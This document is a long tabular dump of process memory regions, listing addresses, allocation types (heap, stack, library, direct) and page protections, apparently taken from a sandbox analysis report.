2D8F3CAC000
|
heap
|
page read and write
|
||
8F449FF000
|
stack
|
page read and write
|
||
196D8B20000
|
heap
|
page read and write
|
||
2D8F6677000
|
heap
|
page read and write
|
||
19CBBB83000
|
heap
|
page read and write
|
||
2625EE70000
|
heap
|
page read and write
|
||
2D8F6118000
|
heap
|
page read and write
|
||
5F65D7E000
|
stack
|
page read and write
|
||
1E0047B8000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
7FFE12E19000
|
unkown
|
page execute and read and write
|
||
2D8F5DF5000
|
heap
|
page read and write
|
||
2D8F637F000
|
heap
|
page read and write
|
||
7FFD9B130000
|
trusted library allocation
|
page read and write
|
||
F0EA1CD000
|
stack
|
page read and write
|
||
2D8F64C4000
|
heap
|
page read and write
|
||
8677DFF000
|
stack
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F63D4000
|
heap
|
page read and write
|
||
51293CF000
|
stack
|
page read and write
|
||
21902004000
|
trusted library allocation
|
page read and write
|
||
2D8F6641000
|
heap
|
page read and write
|
||
1DC70E49000
|
heap
|
page read and write
|
||
2D8F6638000
|
heap
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
2D8F6364000
|
heap
|
page read and write
|
||
1E002510000
|
heap
|
page execute and read and write
|
||
2AF86530000
|
heap
|
page read and write
|
||
2D8F60EE000
|
heap
|
page read and write
|
||
2D8F65FA000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
219189A8000
|
heap
|
page read and write
|
||
1F9F000
|
stack
|
page read and write
|
||
2D8F64D8000
|
heap
|
page read and write
|
||
21645AD3000
|
heap
|
page read and write
|
||
2D8F64A4000
|
heap
|
page read and write
|
||
2D8F6382000
|
heap
|
page read and write
|
||
2D8F658A000
|
heap
|
page read and write
|
||
45D147E000
|
stack
|
page read and write
|
||
2D8F6408000
|
heap
|
page read and write
|
||
208710E0000
|
heap
|
page read and write
|
||
2D8F663F000
|
heap
|
page read and write
|
||
7FFD9AD03000
|
trusted library allocation
|
page execute and read and write
|
||
21EE5810000
|
heap
|
page read and write
|
||
13DF6EB4000
|
heap
|
page read and write
|
||
7FFD9AED0000
|
trusted library allocation
|
page execute and read and write
|
||
278961B0000
|
heap
|
page read and write
|
||
28A22230000
|
heap
|
page read and write
|
||
8E63FF000
|
stack
|
page read and write
|
||
7FFD9AFE0000
|
trusted library allocation
|
page read and write
|
||
E20000
|
trusted library allocation
|
page read and write
|
||
181AD79C000
|
heap
|
page read and write
|
||
19F107F000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F3C60000
|
heap
|
page read and write
|
||
3E00000
|
direct allocation
|
page read and write
|
||
7FF633FED000
|
unkown
|
page write copy
|
||
20DBCB9E000
|
heap
|
page read and write
|
||
1E004413000
|
trusted library allocation
|
page read and write
|
||
278CAC64000
|
heap
|
page read and write
|
||
2D8F6638000
|
heap
|
page read and write
|
||
263BF148000
|
heap
|
page read and write
|
||
5982BAC000
|
stack
|
page read and write
|
||
2D8F63B4000
|
heap
|
page read and write
|
||
1230000
|
heap
|
page read and write
|
||
2197E700000
|
heap
|
page read and write
|
||
2D8F3C47000
|
heap
|
page read and write
|
||
263BF354000
|
heap
|
page read and write
|
||
13DF6C58000
|
heap
|
page read and write
|
||
7FFE126D0000
|
unkown
|
page readonly
|
||
2D8F5E6B000
|
heap
|
page read and write
|
||
1A49C5C4000
|
heap
|
page read and write
|
||
2D8F63D4000
|
heap
|
page read and write
|
||
2D8F6301000
|
heap
|
page read and write
|
||
427D96C000
|
stack
|
page read and write
|
||
B53283E000
|
stack
|
page read and write
|
||
7FFD9B020000
|
trusted library allocation
|
page read and write
|
||
5982E7F000
|
stack
|
page read and write
|
||
2D8F65FB000
|
heap
|
page read and write
|
||
181AD7A7000
|
heap
|
page read and write
|
||
282B629B000
|
heap
|
page read and write
|
||
2D8F6B89000
|
heap
|
page read and write
|
||
21645A00000
|
heap
|
page read and write
|
||
215A32CE000
|
heap
|
page read and write
|
||
2D8F72DA000
|
heap
|
page read and write
|
||
7FF63426E000
|
unkown
|
page readonly
|
||
2D8F6B47000
|
heap
|
page read and write
|
||
2D8F5E51000
|
heap
|
page read and write
|
||
221566A0000
|
heap
|
page read and write
|
||
1D7A000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F649A000
|
heap
|
page read and write
|
||
19CBC278000
|
heap
|
page read and write
|
||
7D9FDFF000
|
stack
|
page read and write
|
||
2D8F5E41000
|
heap
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
BAA487E000
|
stack
|
page read and write
|
||
2197E8FB000
|
heap
|
page read and write
|
||
295326F0000
|
heap
|
page read and write
|
||
280B56B0000
|
heap
|
page read and write
|
||
7FFE10230000
|
unkown
|
page readonly
|
||
B3C29AC000
|
stack
|
page read and write
|
||
45D115F000
|
stack
|
page read and write
|
||
7FFD9B042000
|
trusted library allocation
|
page read and write
|
||
2D8F6466000
|
heap
|
page read and write
|
||
19CBBB83000
|
heap
|
page read and write
|
||
219101E1000
|
trusted library allocation
|
page read and write
|
||
2197FD26000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2197E901000
|
heap
|
page read and write
|
||
2D8F658A000
|
heap
|
page read and write
|
||
282ACFC1000
|
heap
|
page read and write
|
||
EAE24CD000
|
stack
|
page read and write
|
||
7FFD9AED4000
|
trusted library allocation
|
page read and write
|
||
2000000
|
direct allocation
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
20DBCB94000
|
heap
|
page read and write
|
||
21645AA8000
|
heap
|
page read and write
|
||
43163AF000
|
stack
|
page read and write
|
||
2070D560000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
21645ADC000
|
heap
|
page read and write
|
||
13DF6C61000
|
heap
|
page read and write
|
||
1E0046F2000
|
trusted library allocation
|
page read and write
|
||
2D8F5E6B000
|
heap
|
page read and write
|
||
2D8F6474000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
20CA0741000
|
heap
|
page read and write
|
||
AF3857D000
|
stack
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
1D8E000
|
heap
|
page read and write
|
||
21918A24000
|
heap
|
page read and write
|
||
2D8F5E41000
|
heap
|
page read and write
|
||
2D8F6472000
|
heap
|
page read and write
|
||
2D8F63E1000
|
heap
|
page read and write
|
||
1A49C470000
|
heap
|
page read and write
|
||
20CA08F0000
|
heap
|
page read and write
|
||
34098FE000
|
stack
|
page read and write
|
||
19CBBD30000
|
trusted library allocation
|
page read and write
|
||
7FFE13347000
|
unkown
|
page readonly
|
||
2D8F6631000
|
heap
|
page read and write
|
||
219187C0000
|
heap
|
page read and write
|
||
2D8F72D0000
|
direct allocation
|
page read and write
|
||
282ACF70000
|
heap
|
page read and write
|
||
7FFDFAF79000
|
unkown
|
page execute and read and write
|
||
4C2D6FF000
|
stack
|
page read and write
|
||
2D8F3C3E000
|
heap
|
page read and write
|
||
2D8F3CAC000
|
heap
|
page read and write
|
||
217B5045000
|
heap
|
page read and write
|
||
2625ED00000
|
heap
|
page read and write
|
||
19CBC299000
|
heap
|
page read and write
|
||
CDAD47D000
|
stack
|
page read and write
|
||
7FFE148EE000
|
unkown
|
page read and write
|
||
2D199CC1000
|
heap
|
page read and write
|
||
1D72000
|
heap
|
page read and write
|
||
B5320FF000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
F8B000
|
stack
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
7FFD9AD5C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE10265000
|
unkown
|
page execute and read and write
|
||
21900266000
|
trusted library allocation
|
page read and write
|
||
2D8F667B000
|
heap
|
page read and write
|
||
280B57A0000
|
heap
|
page read and write
|
||
7FFD9AF00000
|
trusted library allocation
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
23DAA089000
|
heap
|
page read and write
|
||
21918916000
|
heap
|
page read and write
|
||
2D8F64A4000
|
heap
|
page read and write
|
||
2D8F63F6000
|
heap
|
page read and write
|
||
20DBCBA0000
|
heap
|
page read and write
|
||
2D8F63F8000
|
heap
|
page read and write
|
||
4315FCF000
|
stack
|
page read and write
|
||
8E5FAC000
|
stack
|
page read and write
|
||
2D8F63A3000
|
heap
|
page read and write
|
||
2070D2B0000
|
heap
|
page read and write
|
||
286A5550000
|
heap
|
page read and write
|
||
21918714000
|
heap
|
page read and write
|
||
7FFDFB64D000
|
unkown
|
page execute and read and write
|
||
23A0FFFD000
|
heap
|
page read and write
|
||
7FFD9AFD0000
|
trusted library allocation
|
page read and write
|
||
7FFDFB776000
|
unkown
|
page execute and write copy
|
||
2D8F5DAD000
|
heap
|
page read and write
|
||
BAA497E000
|
stack
|
page read and write
|
||
2D8F63AE000
|
heap
|
page read and write
|
||
28A22040000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7A6D9FF000
|
stack
|
page read and write
|
||
290CEFF000
|
stack
|
page read and write
|
||
1FE98624000
|
heap
|
page read and write
|
||
2D8F643B000
|
heap
|
page read and write
|
||
7FFD9B020000
|
trusted library allocation
|
page read and write
|
||
2197E8EA000
|
heap
|
page read and write
|
||
518C000
|
trusted library allocation
|
page read and write
|
||
7FFE130C9000
|
unkown
|
page execute and read and write
|
||
29532518000
|
heap
|
page read and write
|
||
7FFD9AEF0000
|
trusted library allocation
|
page execute and read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
13DF6BC0000
|
heap
|
page read and write
|
||
2D8F647A000
|
heap
|
page read and write
|
||
81E000
|
stack
|
page read and write
|
||
2D8F3C8B000
|
heap
|
page read and write
|
||
21447509000
|
heap
|
page read and write
|
||
21900050000
|
heap
|
page readonly
|
||
217B4FD0000
|
heap
|
page read and write
|
||
17A51825000
|
heap
|
page read and write
|
||
181B0DE9000
|
direct allocation
|
page read and write
|
||
513B000
|
trusted library allocation
|
page read and write
|
||
19CBBB22000
|
heap
|
page read and write
|
||
219188C9000
|
heap
|
page read and write
|
||
23DAA2A0000
|
heap
|
page read and write
|
||
E36F87C000
|
stack
|
page read and write
|
||
2D8F6650000
|
heap
|
page read and write
|
||
2D8F6666000
|
heap
|
page read and write
|
||
23DAA080000
|
heap
|
page read and write
|
||
2D8F6C0B000
|
heap
|
page read and write
|
||
217B5090000
|
heap
|
page read and write
|
||
2D8F63F6000
|
heap
|
page read and write
|
||
7FFDFAFA0000
|
unkown
|
page readonly
|
||
7FFD9AFF0000
|
trusted library allocation
|
page read and write
|
||
235B34A0000
|
heap
|
page read and write
|
||
17A51820000
|
heap
|
page read and write
|
||
F7F4E8000
|
stack
|
page read and write
|
||
21910255000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1FE98620000
|
heap
|
page read and write
|
||
1B091A08000
|
heap
|
page read and write
|
||
7FFE130CA000
|
unkown
|
page execute and write copy
|
||
181AD93B000
|
direct allocation
|
page read and write
|
||
256F2C30000
|
heap
|
page read and write
|
||
1FE98220000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
7FFE0EB40000
|
unkown
|
page readonly
|
||
2D8F63A0000
|
heap
|
page read and write
|
||
181B0C20000
|
direct allocation
|
page read and write
|
||
1F72ED51000
|
heap
|
page read and write
|
||
7CE000
|
stack
|
page read and write
|
||
28A22250000
|
heap
|
page read and write
|
||
181B0D00000
|
direct allocation
|
page read and write
|
||
2D8F64FA000
|
heap
|
page read and write
|
||
2D8F5940000
|
direct allocation
|
page read and write
|
||
167E7FF0000
|
heap
|
page read and write
|
||
2D8F6659000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
1C34C650000
|
heap
|
page read and write
|
||
2D8F64FA000
|
heap
|
page read and write
|
||
2D8F648B000
|
heap
|
page read and write
|
||
7FFD9AEBA000
|
trusted library allocation
|
page read and write
|
||
256E8B31000
|
heap
|
page read and write
|
||
7FFD9AD02000
|
trusted library allocation
|
page read and write
|
||
B89CAFF000
|
stack
|
page read and write
|
||
7FF623F9B000
|
unkown
|
page readonly
|
||
19CBBB45000
|
heap
|
page read and write
|
||
2D8F6450000
|
heap
|
page read and write
|
||
2D8F69C0000
|
direct allocation
|
page read and write
|
||
2D8F5DE0000
|
heap
|
page read and write
|
||
2D8F6A50000
|
direct allocation
|
page read and write
|
||
24EF2848000
|
heap
|
page read and write
|
||
24310B89000
|
heap
|
page read and write
|
||
2D8F649A000
|
heap
|
page read and write
|
||
2D8F3CAD000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F663F000
|
heap
|
page read and write
|
||
84174FB000
|
stack
|
page read and write
|
||
256E8A80000
|
heap
|
page read and write
|
||
181B0DA0000
|
direct allocation
|
page read and write
|
||
21645ACF000
|
heap
|
page read and write
|
||
181B0D16000
|
direct allocation
|
page read and write
|
||
2D8F646B000
|
heap
|
page read and write
|
||
2E4A9C20000
|
heap
|
page read and write
|
||
26531AF0000
|
heap
|
page read and write
|
||
181AD81C000
|
heap
|
page read and write
|
||
1E012B7C000
|
trusted library allocation
|
page read and write
|
||
1E000C20000
|
trusted library allocation
|
page read and write
|
||
EF993FF000
|
stack
|
page read and write
|
||
5280000
|
heap
|
page read and write
|
||
1E012DF7000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
7FFDFB321000
|
unkown
|
page execute and read and write
|
||
1E000C74000
|
heap
|
page read and write
|
||
F46000
|
heap
|
page read and write
|
||
2070D3C0000
|
heap
|
page read and write
|
||
26531790000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
219104DC000
|
trusted library allocation
|
page read and write
|
||
2D8F64A6000
|
heap
|
page read and write
|
||
2D8F6478000
|
heap
|
page read and write
|
||
2D8F64F2000
|
heap
|
page read and write
|
||
1326000
|
heap
|
page read and write
|
||
20871151000
|
heap
|
page read and write
|
||
256F2B84000
|
heap
|
page read and write
|
||
1B091970000
|
heap
|
page read and write
|
||
7FFDFB029000
|
unkown
|
page execute and read and write
|
||
CF12D9E000
|
stack
|
page read and write
|
||
278CAC60000
|
heap
|
page read and write
|
||
5110000
|
trusted library allocation
|
page execute and read and write
|
||
2D8F6428000
|
heap
|
page read and write
|
||
1DC70E51000
|
heap
|
page read and write
|
||
514E000
|
trusted library allocation
|
page read and write
|
||
2D8F648B000
|
heap
|
page read and write
|
||
167E8314000
|
heap
|
page read and write
|
||
266C2AD0000
|
heap
|
page read and write
|
||
19CBBD30000
|
trusted library allocation
|
page read and write
|
||
7FFDFA110000
|
unkown
|
page readonly
|
||
2D8F5E6B000
|
heap
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
7FFD9AE20000
|
trusted library allocation
|
page execute and read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
4315DDF000
|
stack
|
page read and write
|
||
1D92000
|
heap
|
page read and write
|
||
7FF623F9B000
|
unkown
|
page readonly
|
||
2D8F60C9000
|
heap
|
page read and write
|
||
E40000
|
trusted library allocation
|
page read and write
|
||
2D8F667B000
|
heap
|
page read and write
|
||
7FFD9B010000
|
trusted library allocation
|
page read and write
|
||
7FFD9AED2000
|
trusted library allocation
|
page read and write
|
||
20DBCBB8000
|
heap
|
page read and write
|
||
B98FB2C000
|
stack
|
page read and write
|
||
19CBC28E000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
1E000AD3000
|
heap
|
page read and write
|
||
2625EB10000
|
heap
|
page read and write
|
||
4C2D1A3000
|
stack
|
page read and write
|
||
7FF623F70000
|
unkown
|
page readonly
|
||
1F52F095000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9ACF3000
|
trusted library allocation
|
page execute and read and write
|
||
19CBBB8F000
|
heap
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
2A62F3AB000
|
heap
|
page read and write
|
||
208710C0000
|
heap
|
page read and write
|
||
7FFE148E9000
|
unkown
|
page execute and read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
937A8FC000
|
stack
|
page read and write
|
||
181AD7BC000
|
heap
|
page read and write
|
||
2D8F60ED000
|
heap
|
page read and write
|
||
2D8F64CD000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
1D920920000
|
heap
|
page read and write
|
||
7FFD9ACF2000
|
trusted library allocation
|
page read and write
|
||
2D8F72F4000
|
direct allocation
|
page read and write
|
||
2D8F6407000
|
heap
|
page read and write
|
||
1D9206A1000
|
heap
|
page read and write
|
||
7FF633FEA000
|
unkown
|
page readonly
|
||
2D8F644C000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F3C86000
|
heap
|
page read and write
|
||
2D8F5DF5000
|
heap
|
page read and write
|
||
27CC37C0000
|
heap
|
page read and write
|
||
B53207E000
|
stack
|
page read and write
|
||
19CBC28E000
|
heap
|
page read and write
|
||
4C2D8FE000
|
stack
|
page read and write
|
||
2BC0000
|
heap
|
page read and write
|
||
1E0025F0000
|
heap
|
page read and write
|
||
7FFE130C1000
|
unkown
|
page execute and read and write
|
||
2D8F63A0000
|
heap
|
page read and write
|
||
2D8F6658000
|
heap
|
page read and write
|
||
2D8F6638000
|
heap
|
page read and write
|
||
2D8F69CE000
|
heap
|
page read and write
|
||
2D8F63A0000
|
heap
|
page read and write
|
||
2070D3C4000
|
heap
|
page read and write
|
||
217B4EF0000
|
heap
|
page read and write
|
||
20CA0A60000
|
heap
|
page read and write
|
||
19CBC277000
|
heap
|
page read and write
|
||
7FFE148E0000
|
unkown
|
page readonly
|
||
2D8F64AE000
|
heap
|
page read and write
|
||
2D8F6313000
|
heap
|
page read and write
|
||
1A49C391000
|
heap
|
page read and write
|
||
5200000
|
direct allocation
|
page read and write
|
||
19F117F000
|
stack
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
7FFDFAF8E000
|
unkown
|
page execute and read and write
|
||
219188C0000
|
heap
|
page read and write
|
||
1E002F10000
|
trusted library allocation
|
page read and write
|
||
1A6018F9000
|
heap
|
page read and write
|
||
2D8F6466000
|
heap
|
page read and write
|
||
5162000
|
trusted library allocation
|
page read and write
|
||
2D8F615E000
|
heap
|
page read and write
|
||
2A62F3A0000
|
heap
|
page read and write
|
||
2D8F65A2000
|
heap
|
page read and write
|
||
21918AE0000
|
trusted library allocation
|
page read and write
|
||
2D8F6ABC000
|
direct allocation
|
page read and write
|
||
7FF623FB4000
|
unkown
|
page readonly
|
||
16B0000
|
heap
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
27CC37A0000
|
heap
|
page read and write
|
||
2D8F64BC000
|
heap
|
page read and write
|
||
1990000
|
trusted library allocation
|
page read and write
|
||
2D8F6678000
|
heap
|
page read and write
|
||
1A6036F0000
|
heap
|
page read and write
|
||
2D8F640A000
|
heap
|
page read and write
|
||
2D8F63F6000
|
heap
|
page read and write
|
||
2D8F63E9000
|
heap
|
page read and write
|
||
2D199F30000
|
heap
|
page read and write
|
||
1B8C000
|
stack
|
page read and write
|
||
3800AFF000
|
unkown
|
page read and write
|
||
2D8F63DF000
|
heap
|
page read and write
|
||
7FF77203B000
|
unkown
|
page readonly
|
||
5982EFF000
|
stack
|
page read and write
|
||
22156955000
|
heap
|
page read and write
|
||
2D8F72F0000
|
direct allocation
|
page read and write
|
||
2D8F6472000
|
heap
|
page read and write
|
||
282B61F0000
|
heap
|
page read and write
|
||
2D8F6AD0000
|
heap
|
page read and write
|
||
1E000AFE000
|
heap
|
page read and write
|
||
2D8F6614000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
340956B000
|
stack
|
page read and write
|
||
2D8F64BE000
|
heap
|
page read and write
|
||
181B0C60000
|
direct allocation
|
page read and write
|
||
7FF623F70000
|
unkown
|
page readonly
|
||
2D8F5D81000
|
heap
|
page read and write
|
||
2D8F6349000
|
heap
|
page read and write
|
||
1E000BA0000
|
heap
|
page read and write
|
||
CD6AC7D000
|
stack
|
page read and write
|
||
24310B10000
|
heap
|
page read and write
|
||
7FFD9AEC0000
|
trusted library allocation
|
page execute and read and write
|
||
263BF350000
|
heap
|
page read and write
|
||
2CF9000
|
trusted library allocation
|
page read and write
|
||
2D8F647A000
|
heap
|
page read and write
|
||
181AD860000
|
heap
|
page read and write
|
||
282ACF80000
|
heap
|
page read and write
|
||
21645A20000
|
heap
|
page read and write
|
||
1DC70E3B000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
7FF771DBC000
|
unkown
|
page write copy
|
||
2E4A9A7B000
|
heap
|
page read and write
|
||
2F7F1CD000
|
stack
|
page read and write
|
||
1A6018A4000
|
heap
|
page read and write
|
||
7FFD9AEB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B040000
|
trusted library allocation
|
page read and write
|
||
181AD7B3000
|
heap
|
page read and write
|
||
2D8F6685000
|
heap
|
page read and write
|
||
2D8F3C96000
|
heap
|
page read and write
|
||
FB0000
|
heap
|
page read and write
|
||
4C2D67E000
|
stack
|
page read and write
|
||
DE69AFF000
|
unkown
|
page read and write
|
||
2A62F3AD000
|
heap
|
page read and write
|
||
48C61FE000
|
stack
|
page read and write
|
||
B532377000
|
stack
|
page read and write
|
||
45D14FE000
|
stack
|
page read and write
|
||
1F72ED51000
|
heap
|
page read and write
|
||
2D8F6468000
|
heap
|
page read and write
|
||
2D8F6496000
|
heap
|
page read and write
|
||
20DBCBB6000
|
heap
|
page read and write
|
||
F22B2FF000
|
unkown
|
page read and write
|
||
19CBC283000
|
heap
|
page read and write
|
||
278CA960000
|
heap
|
page read and write
|
||
2D8F6472000
|
heap
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
265319C0000
|
heap
|
page read and write
|
||
256F2B90000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F64E7000
|
heap
|
page read and write
|
||
196D8B30000
|
heap
|
page read and write
|
||
2191890E000
|
heap
|
page read and write
|
||
1E002B82000
|
trusted library allocation
|
page read and write
|
||
181B0CA0000
|
direct allocation
|
page read and write
|
||
886000
|
heap
|
page read and write
|
||
2D8F6497000
|
heap
|
page read and write
|
||
196D897A000
|
heap
|
page read and write
|
||
7FFD9AEB1000
|
trusted library allocation
|
page read and write
|
||
215A32A6000
|
heap
|
page read and write
|
||
7FF623F71000
|
unkown
|
page execute read
|
||
7DF4D7600000
|
trusted library allocation
|
page execute and read and write
|
||
2197E19E000
|
heap
|
page read and write
|
||
280B56F0000
|
heap
|
page read and write
|
||
1F72ED49000
|
heap
|
page read and write
|
||
7FFD9B059000
|
trusted library allocation
|
page read and write
|
||
280B56E0000
|
heap
|
page read and write
|
||
2A62F3A7000
|
heap
|
page read and write
|
||
2D8F64C4000
|
heap
|
page read and write
|
||
2D4F000
|
stack
|
page read and write
|
||
2D8F63DA000
|
heap
|
page read and write
|
||
1D86000
|
heap
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
17A51521000
|
heap
|
page read and write
|
||
21900020000
|
trusted library allocation
|
page read and write
|
||
2D199C30000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F64C4000
|
heap
|
page read and write
|
||
A1A000
|
heap
|
page read and write
|
||
45D10DB000
|
stack
|
page read and write
|
||
19CBBD60000
|
heap
|
page read and write
|
||
181B0D40000
|
direct allocation
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
7FFD9B150000
|
trusted library allocation
|
page read and write
|
||
23A102D0000
|
heap
|
page read and write
|
||
263BF040000
|
heap
|
page read and write
|
||
EAE254E000
|
stack
|
page read and write
|
||
181AD78A000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F647C000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2197E8E0000
|
heap
|
page read and write
|
||
7FF623FB1000
|
unkown
|
page read and write
|
||
21918992000
|
heap
|
page read and write
|
||
5151000
|
trusted library allocation
|
page read and write
|
||
3400000
|
direct allocation
|
page read and write
|
||
21E8EE9C000
|
heap
|
page read and write
|
||
1275000
|
heap
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
7FFD9B070000
|
trusted library allocation
|
page read and write
|
||
3CD1000
|
trusted library allocation
|
page read and write
|
||
201E0319000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
19CBBDB0000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
24EF2840000
|
heap
|
page read and write
|
||
7FFD9AF90000
|
trusted library allocation
|
page read and write
|
||
2D8F6638000
|
heap
|
page read and write
|
||
19CBDB4E000
|
heap
|
page read and write
|
||
181AD7C4000
|
heap
|
page read and write
|
||
28A22061000
|
heap
|
page read and write
|
||
7FFD9B070000
|
trusted library allocation
|
page read and write
|
||
20871120000
|
heap
|
page read and write
|
||
280B57A9000
|
heap
|
page read and write
|
||
219187A0000
|
heap
|
page read and write
|
||
51EA000
|
stack
|
page read and write
|
||
196D8991000
|
heap
|
page read and write
|
||
3800BFF000
|
stack
|
page read and write
|
||
19DCC990000
|
heap
|
page read and write
|
||
2D8F5D80000
|
heap
|
page read and write
|
||
1E000AB9000
|
heap
|
page read and write
|
||
CE0000
|
heap
|
page read and write
|
||
1E002D2A000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1A60187F000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
23D52B50000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1F72ED51000
|
heap
|
page read and write
|
||
2D8F6172000
|
heap
|
page read and write
|
||
7FFE10241000
|
unkown
|
page execute and read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
256E8B31000
|
heap
|
page read and write
|
||
2D8F64A1000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
24310E04000
|
heap
|
page read and write
|
||
7FFDFB019000
|
unkown
|
page execute and read and write
|
||
2D8F3C60000
|
heap
|
page read and write
|
||
167E7EF0000
|
heap
|
page read and write
|
||
2D8F64D8000
|
heap
|
page read and write
|
||
7FFD9AFB0000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1764ECD000
|
stack
|
page read and write
|
||
24310B40000
|
heap
|
page read and write
|
||
2191890A000
|
heap
|
page read and write
|
||
196D8991000
|
heap
|
page read and write
|
||
1E01AD56000
|
heap
|
page read and write
|
||
20CA0930000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9AF80000
|
trusted library allocation
|
page read and write
|
||
1A49C37A000
|
heap
|
page read and write
|
||
24EF2800000
|
heap
|
page read and write
|
||
2D8F72D4000
|
direct allocation
|
page read and write
|
||
1D9205E0000
|
heap
|
page read and write
|
||
19CBDB54000
|
heap
|
page read and write
|
||
2D8F64E7000
|
heap
|
page read and write
|
||
2E4A9A75000
|
heap
|
page read and write
|
||
B5328BB000
|
stack
|
page read and write
|
||
8F445AD000
|
stack
|
page read and write
|
||
2E4A9A5B000
|
heap
|
page read and write
|
||
2D8F3C2F000
|
heap
|
page read and write
|
||
21645AB9000
|
heap
|
page read and write
|
||
2D8F6102000
|
heap
|
page read and write
|
||
1DC70DA0000
|
heap
|
page read and write
|
||
1E000A70000
|
heap
|
page read and write
|
||
2D8F5550000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F6A24000
|
direct allocation
|
page read and write
|
||
1C378A30000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
B53227A000
|
stack
|
page read and write
|
||
17A516D0000
|
heap
|
page read and write
|
||
C7E000
|
stack
|
page read and write
|
||
4C2D47F000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F3C54000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F6658000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F5DF5000
|
heap
|
page read and write
|
||
43161BE000
|
stack
|
page read and write
|
||
8E62FF000
|
unkown
|
page read and write
|
||
1E002450000
|
trusted library allocation
|
page read and write
|
||
2D8F649A000
|
heap
|
page read and write
|
||
1E01ABE5000
|
heap
|
page read and write
|
||
84176FF000
|
stack
|
page read and write
|
||
5F65C7F000
|
stack
|
page read and write
|
||
83D70FF000
|
stack
|
page read and write
|
||
7FFE130C0000
|
unkown
|
page readonly
|
||
2D8F3C60000
|
heap
|
page read and write
|
||
2197E17E000
|
heap
|
page read and write
|
||
2D8F64A6000
|
heap
|
page read and write
|
||
2D8F60C9000
|
heap
|
page read and write
|
||
2D8F5E41000
|
heap
|
page read and write
|
||
2D8F3C47000
|
heap
|
page read and write
|
||
2D8F64FA000
|
heap
|
page read and write
|
||
7FF623FB4000
|
unkown
|
page readonly
|
||
C3B000
|
stack
|
